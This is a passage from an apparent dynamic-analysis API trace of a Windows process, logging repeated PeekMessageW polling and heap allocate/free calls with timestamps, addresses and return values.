wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.444] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.444] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.444] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.445] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.445] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.445] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.445] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.445] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.446] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.446] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.446] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.446] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.446] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.447] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.447] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.447] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.447] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.447] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.447] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.448] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.448] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.448] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.448] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b18 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.449] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.449] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.449] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.450] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.450] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.450] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.450] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.451] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.451] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.451] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.451] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.451] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.451] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.451] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.451] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.451] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.451] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.452] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 